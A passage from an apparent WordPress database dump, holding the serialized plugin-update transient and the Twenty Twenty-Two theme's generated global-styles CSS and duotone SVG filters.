ntact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.6.4\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.6.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.9\";s:6:\"tested\";s:3:\"6.1\";s:12:\"requires_php\";b:0;}s:27:\"logo-carousel-free/main.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:32:\"w.org/plugins/logo-carousel-free\";s:4:\"slug\";s:18:\"logo-carousel-free\";s:6:\"plugin\";s:27:\"logo-carousel-free/main.php\";s:11:\"new_version\";s:6:\"3.4.14\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/logo-carousel-free/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/logo-carousel-free.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:71:\"https://ps.w.org/logo-carousel-free/assets/icon-256x256.png?rev=2726528\";s:2:\"1x\";s:63:\"https://ps.w.org/logo-carousel-free/assets/icon.svg?rev=2726528\";s:3:\"svg\";s:63:\"https://ps.w.org/logo-carousel-free/assets/icon.svg?rev=2726528\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/logo-carousel-free/assets/banner-772x250.png?rev=2644474\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.3\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}}s:7:\"checked\";a:5:{s:19:\"akismet/akismet.php\";s:3:\"5.0\";s:35:\"carousel-slider/carousel-slider.php\";s:5:\"2.1.0\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"5.6.3\";s:9:\"hello.php\";s:5:\"1.7.2\";s:27:\"logo-carousel-free/main.php\";s:6:\"3.4.13\";}}','no'),(188410,'_transient_timeout_global_styles_twentytwentytwo','1667844679','no'),(188411,'_transient_global_styles_twentytwentytwo','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--foreground: #000000;--wp--preset--color--background: #ffffff;--wp--preset--color--primary: #1a4548;--wp--preset--color--secondary: #ffe2c7;--wp--preset--color--tertiary: #F6F6F6;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--gradient--vertical-secondary-to-tertiary: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--tertiary) 100%);--wp--preset--gradient--vertical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--diagonal-primary-to-foreground: linear-gradient(to bottom right,var(--wp--preset--color--primary) 0%,var(--wp--preset--color--foreground) 100%);--wp--preset--gradient--diagonal-secondary-to-background: linear-gradient(to bottom right,var(--wp--preset--color--secondary) 50%,var(--wp--preset--color--background) 50%);--wp--preset--gradient--diagonal-background-to-secondary: linear-gradient(to bottom right,var(--wp--preset--color--background) 50%,var(--wp--preset--color--secondary) 50%);--wp--preset--gradient--diagonal-tertiary-to-background: linear-gradient(to bottom right,var(--wp--preset--color--tertiary) 50%,var(--wp--preset--color--background) 50%);--wp--preset--gradient--diagonal-background-to-tertiary: linear-gradient(to bottom right,var(--wp--preset--color--background) 50%,var(--wp--preset--color--tertiary) 50%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--duotone--foreground-and-background: url(\'#wp-duotone-foreground-and-background\');--wp--preset--duotone--foreground-and-secondary: url(\'#wp-duotone-foreground-and-secondary\');--wp--preset--duotone--foreground-and-tertiary: url(\'#wp-duotone-foreground-and-tertiary\');--wp--preset--duotone--primary-and-background: url(\'#wp-duotone-primary-and-background\');--wp--preset--duotone--primary-and-secondary: url(\'#wp-duotone-primary-and-secondary\');--wp--preset--duotone--primary-and-tertiary: url(\'#wp-duotone-primary-and-tertiary\');--wp--preset--font-size--small: 1rem;--wp--preset--font-size--medium: 1.125rem;--wp--preset--font-size--large: 1.75rem;--wp--preset--font-size--x-large: clamp(1.75rem, 3vw, 2.25rem);--wp--preset--font-family--system-font: -apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,Oxygen-Sans,Ubuntu,Cantarell,\"Helvetica Neue\",sans-serif;--wp--preset--font-family--source-serif-pro: \"Source Serif Pro\", serif;--wp--custom--spacing--small: max(1.25rem, 5vw);--wp--custom--spacing--medium: clamp(2rem, 8vw, calc(4 * var(--wp--style--block-gap)));--wp--custom--spacing--large: clamp(4rem, 10vw, 8rem);--wp--custom--spacing--outer: var(--wp--custom--spacing--small, 1.25rem);--wp--custom--typography--font-size--huge: clamp(2.25rem, 4vw, 2.75rem);--wp--custom--typography--font-size--gigantic: clamp(2.75rem, 6vw, 3.25rem);--wp--custom--typography--font-size--colossal: clamp(3.25rem, 8vw, 6.25rem);--wp--custom--typography--line-height--tiny: 1.15;--wp--custom--typography--line-height--small: 1.2;--wp--custom--typography--line-height--medium: 1.4;--wp--custom--typography--line-height--normal: 1.6;}body { margin: 0; }body{background-color: var(--wp--preset--color--background);color: var(--wp--preset--color--foreground);font-family: var(--wp--preset--font-family--system-font);font-size: var(--wp--preset--font-size--medium);line-height: var(--wp--custom--typography--line-height--normal);--wp--style--block-gap: 1.5rem;}.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }.wp-site-blocks > * { margin-block-start: 0; margin-block-end: 0; }.wp-site-blocks > * + * { margin-block-start: var( --wp--style--block-gap ); }h1{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--custom--typography--font-size--colossal);font-weight: 300;line-height: var(--wp--custom--typography--line-height--tiny);}h2{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--custom--typography--font-size--gigantic);font-weight: 300;line-height: var(--wp--custom--typography--line-height--small);}h3{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--custom--typography--font-size--huge);font-weight: 300;line-height: var(--wp--custom--typography--line-height--tiny);}h4{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--preset--font-size--x-large);font-weight: 300;line-height: var(--wp--custom--typography--line-height--tiny);}h5{font-family: var(--wp--preset--font-family--system-font);font-size: var(--wp--preset--font-size--medium);font-weight: 700;line-height: var(--wp--custom--typography--line-height--normal);text-transform: uppercase;}h6{font-family: var(--wp--preset--font-family--system-font);font-size: var(--wp--preset--font-size--medium);font-weight: 400;line-height: var(--wp--custom--typography--line-height--normal);text-transform: uppercase;}a{color: var(--wp--preset--color--foreground);}.wp-block-button__link{background-color: var(--wp--preset--color--primary);border-radius: 0;color: var(--wp--preset--color--background);font-size: var(--wp--preset--font-size--medium);}.wp-block-post-title{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--custom--typography--font-size--gigantic);font-weight: 300;line-height: var(--wp--custom--typography--line-height--tiny);}.wp-block-post-comments{padding-top: var(--wp--custom--spacing--small);}.wp-block-pullquote{border-width: 1px 0;}.wp-block-query-title{font-family: var(--wp--preset--font-family--source-serif-pro);font-size: var(--wp--custom--typography--font-size--gigantic);font-weight: 300;line-height: var(--wp--custom--typography--line-height--small);}.wp-block-quote{border-width: 1px;}.wp-block-site-title{font-family: var(--wp--preset--font-family--system-font);font-size: var(--wp--preset--font-size--medium);font-style: italic;font-weight: normal;line-height: var(--wp--custom--typography--line-height--normal);}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-foreground-color{color: var(--wp--preset--color--foreground) !important;}.has-background-color{color: var(--wp--preset--color--background) !important;}.has-primary-color{color: var(--wp--preset--color--primary) !important;}.has-secondary-color{color: var(--wp--preset--color--secondary) !important;}.has-tertiary-color{color: var(--wp--preset--color--tertiary) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-foreground-background-color{background-color: var(--wp--preset--color--foreground) !important;}.has-background-background-color{background-color: var(--wp--preset--color--background) !important;}.has-primary-background-color{background-color: var(--wp--preset--color--primary) !important;}.has-secondary-background-color{background-color: var(--wp--preset--color--secondary) !important;}.has-tertiary-background-color{background-color: var(--wp--preset--color--tertiary) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-foreground-border-color{border-color: var(--wp--preset--color--foreground) !important;}.has-background-border-color{border-color: var(--wp--preset--color--background) !important;}.has-primary-border-color{border-color: var(--wp--preset--color--primary) !important;}.has-secondary-border-color{border-color: var(--wp--preset--color--secondary) !important;}.has-tertiary-border-color{border-color: var(--wp--preset--color--tertiary) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-vertical-secondary-to-tertiary-gradient-background{background: var(--wp--preset--gradient--vertical-secondary-to-tertiary) !important;}.has-vertical-secondary-to-background-gradient-background{background: var(--wp--preset--gradient--vertical-secondary-to-background) !important;}.has-vertical-tertiary-to-background-gradient-background{background: var(--wp--preset--gradient--vertical-tertiary-to-background) !important;}.has-diagonal-primary-to-foreground-gradient-background{background: var(--wp--preset--gradient--diagonal-primary-to-foreground) !important;}.has-diagonal-secondary-to-background-gradient-background{background: var(--wp--preset--gradient--diagonal-secondary-to-background) !important;}.has-diagonal-background-to-secondary-gradient-background{background: var(--wp--preset--gradient--diagonal-background-to-secondary) !important;}.has-diagonal-tertiary-to-background-gradient-background{background: var(--wp--preset--gradient--diagonal-tertiary-to-background) !important;}.has-diagonal-background-to-tertiary-gradient-background{background: var(--wp--preset--gradient--diagonal-background-to-tertiary) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}.has-system-font-font-family{font-family: var(--wp--preset--font-family--system-font) !important;}.has-source-serif-pro-font-family{font-family: var(--wp--preset--font-family--source-serif-pro) !important;}','no'),(188412,'_transient_timeout_global_styles_svg_filters_twentytwentytwo','1667844679','no'),(188413,'_transient_global_styles_svg_filters_twentytwentytwo','<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-dark-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncG type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncB type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.54901960784314 0.98823529411765\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.71764705882353 0.25490196078431\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-red\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 0.27843137254902\" /><feFuncB type=\"table\" tableValues=\"0.5921568627451 0.27843137254902\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-midnight\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0\" /><feFuncG type=\"table\" tableValues=\"0 0.64705882352941\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-magenta-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.78039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.94901960784314\" /><feFuncB type=\"table\" tableValues=\"0.35294117647059 0.47058823529412\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-green\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.65098039215686 0.40392156862745\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.44705882352941 0.4\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-orange\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.098039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.66274509803922\" /><feFuncB type=\"table\" tableValues=\"0.84705882352941 0.41960784313725\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-foreground-and-background\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-foreground-and-secondary\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 0.88627450980392\" /><feFuncB type=\"table\" tableValues=\"0 0.78039215686275\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-foreground-and-tertiary\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0.96470588235294\" /><feFuncG type=\"table\" tableValues=\"0 0.96470588235294\" /><feFuncB type=\"table\" tableValues=\"0 0.96470588235294\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-primary-and-background\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.10196078431373 1\" /><feFuncG type=\"table\" tableValues=\"0.27058823529412 1\" /><feFuncB type=\"table\" tableValues=\"0.28235294117647 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-primary-and-secondary\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.10196078431373 1\" /><feFuncG type=\"table\" tableValues=\"0.27058823529412 0.88627450980392\" /><feFuncB type=\"table\" tableValues=\"0.28235294117647 0.78039215686275\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter 